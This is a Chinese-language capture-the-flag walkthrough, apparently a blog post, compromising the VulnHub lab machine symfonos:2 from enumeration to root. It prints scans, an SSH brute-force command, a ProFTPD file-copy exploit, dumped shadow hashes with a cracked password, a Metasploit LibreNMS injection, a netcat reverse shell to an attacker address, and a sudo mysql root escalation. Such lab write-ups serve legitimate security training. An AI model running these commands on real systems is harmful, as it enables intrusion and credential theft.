对symfonos:2的测试

symfonos:2

主机桥接模式
实验目的:获取root
项目地址:https://www.vulnhub.com/entry/symfonos-2,331/

信息收集

1.png

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
root@kali:~# nmap -T4 -A -v -p- 192.168.31.221
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 9d:f8:5f:87:20:e5:8c:fa:68:47:7d:71:62:08:ad:b9 (RSA)
| 256 04:2a:bb:06:56:ea:d1:93:1c:d2:78:0a:00:46:9d:85 (ECDSA)
|_ 256 28:ad:ac:dc:7e:2a:1c:f6:4c:6b:47:f2:d6:22:5b:52 (ED25519)
80/tcp open http WebFS httpd 1.21
| http-methods:
|_ Supported Methods: GET HEAD
|_http-server-header: webfs/1.21
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)
MAC Address: 08:00:27:B5:39:C4 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Uptime guess: 0.029 days (since Sat Aug 3 01:30:34 2019)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: SYMFONOS2; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h40m00s, deviation: 2h53m12s, median: 0s
| nbstat: NetBIOS name: SYMFONOS2, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| SYMFONOS2<00> Flags: <unique><active>
| SYMFONOS2<03> Flags: <unique><active>
| SYMFONOS2<20> Flags: <unique><active>
| WORKGROUP<00> Flags: <group><active>
|_ WORKGROUP<1e> Flags: <group><active>
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.5.16-Debian)
| Computer name: symfonos2
| NetBIOS computer name: SYMFONOS2\x00
| Domain name: \x00
| FQDN: symfonos2
|_ System time: 2019-08-03T01:12:00-05:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2019-08-03 02:12:00
|_ start_date: N/A

ftp不允许匿名登录
80端口没有枚举出信息

Enum4linux

利用SMB协议枚举Windows系统和SAMBA服务,以此来获得目标系统大量的重要信息,其枚举结果可能包含目标系统的用户帐号、组帐号、共享目录、密码策略等机密重要信息。利用SMB协议枚举Windows系统和SAMBA服务,以此来获得目标系统大量的重要信息,其枚举结果可能包含目标系统的用户帐号、组帐号、共享目录、密码策略等机密重要信息(引用宛老师的话)
概况来说:Enum4linux是一个用于枚举Windows和Samba信息的工具

1
2
3
4
5
6
7
8
root@kali:~# enum4linux -a 192.168.31.221
WARNING: The "syslog" option is deprecated

Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
anonymous Disk
IPC$ IPC IPC Service (Samba 4.5.16-Debian)

找到一个共享文件夹

1
2
3
4
5
root@kali:~# smbclient //192.168.31.221/anonymou
Enter WORKGROUP\root's password: #空密码
smb: \> ls
smb: \> cd backups
smb: \> get log.txt

枚举密码

得到一个用户aeolus,22端口可以枚举

1
hydra -l aeolus -P /usr/share/wordlists/rockyou.txt 192.168.31.221 ssh

但是相对时间太长了,看见ProFTPD 1.3.5,相信也可以利用一下

1
root@kali:~# searchsploit ProFTPD 1.3.5

2.png
此信息与上述漏洞一起使用将shadow放在/home/aeolus/share/backups
3.png

1
2
3
root:$6$VTftENaZ$ggY84BSFETwhissv0N6mt2VaQN9k6/HzwwmTtVkDtTbCbqofFO8MVW.IcOKIzuI07m36uy9.565qelr/beHer.:18095:0:99999:7::
aeolus:$6$dgjUjE.Y$G.dJZCM8.zKmJc9t4iiK9d723/bQ5kE1ux7ucBoAgOsTbaKmp.0iCljaobCntN3nCxsk4DLMy0qTn8ODPlmLG.:18095:0:99999:7:::
cronus:$6$wOmUfiZO$WajhRWpZyuHbjAbtPDQnR3oVQeEKtZtYYElWomv9xZLOhz7ALkHUT2Wp6cFFg1uLCq49SYel5goXroJ0SxU3D/:18095:0:99999:7:::

进行爆破aeolus:sergioteamo

aeolus持续深入

1
2
3
λ ssh aeolus@192.168.31.221
aeolus@symfonos2:~$ id
uid=1000(aeolus) gid=1000(aeolus) groups=1000(aeolus),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)

netstat无法使用,惊喜的发现Nmap可以用

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
aeolus@symfonos2:~$ nmap -T4 -A -v -p- 127.0.0.1
PORT STATE SERVICE VERSION
3306/tcp open mysql MySQL 5.5.5-10.1.38-MariaDB-0+deb9u1
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.1.38-MariaDB-0+deb9u1
| Thread ID: 15
| Capabilities flags: 63487
8080/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-favicon: Unknown favicon MD5: B8211E9B75068FB852BFB155D9A1A2EE
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Did not follow redirect to http://localhost/login

mysql不慌先,8080端口运行着新的http服务,但是是本机运行,将它转发出来

1
aeolus@symfonos2:~$ socat -d TCP-LISTEN:1234,fork,reuseaddr tcp:127.0.0.1:8080

效果图
4.png

利用libreNMS

这个端口上运行着libreNMS
5.png
俩都可以用
这里使用msf加载

1
2
3
4
5
6
7
8
9
10
11
msf5 > use exploit/linux/http/librenms_addhost_cmd_inject
msf5 exploit(linux/http/librenms_addhost_cmd_inject) > show options
msf5 exploit(linux/http/librenms_addhost_cmd_inject) > set rhosts 192.168.31.221
msf5 exploit(linux/http/librenms_addhost_cmd_inject) > set rport 1234
msf5 exploit(linux/http/librenms_addhost_cmd_inject) > set lhost 192.168.31.30
msf5 exploit(linux/http/librenms_addhost_cmd_inject) > set username aeolus
msf5 exploit(linux/http/librenms_addhost_cmd_inject) > set msf5 exploit(linux/http/librenms_addhost_cmd_inject) > set password sergioteamo
msf5 exploit(linux/http/librenms_addhost_cmd_inject) > exploit
python -c "import pty;pty.spawn('/bin/bash')"
cronus@symfonos2:/opt/librenms/html$ id
uid=1001(cronus) gid=1001(cronus) groups=1001(cronus),999(librenms)

不是很会用msf,再次反弹

1
2
3
4
5
nc -e /bin/bash 192.168.31.35 7777
λ nc -nvlp 7777
python -c "import pty;pty.spawn('/bin/bash')"
cronus@symfonos2:/opt/librenms/html$ id
uid=1001(cronus) gid=1001(cronus) groups=1001(cronus),999(librenms)

mysql提权

1
cronus@symfonos2:/home/cronus$ sudo -l

6.png
能root权限运行mysql

1
2
3
cronus@symfonos2:/home/cronus$ sudo -u root mysql -e '\! /bin/sh'
# id
uid=0(root) gid=0(root) groups=0(root)

可爱的flag

7.png

到此结束

如有错误请联系lanbaidetanlang@qq.com

文章目录
  1. 1. symfonos:2
    1. 1.1. 信息收集
      1. 1.1.1. Enum4linux
    2. 1.2. 枚举密码
    3. 1.3. aeolus持续深入
    4. 1.4. 利用libreNMS
    5. 1.5. mysql提权
    6. 1.6. 可爱的flag
  2. 2. 到此结束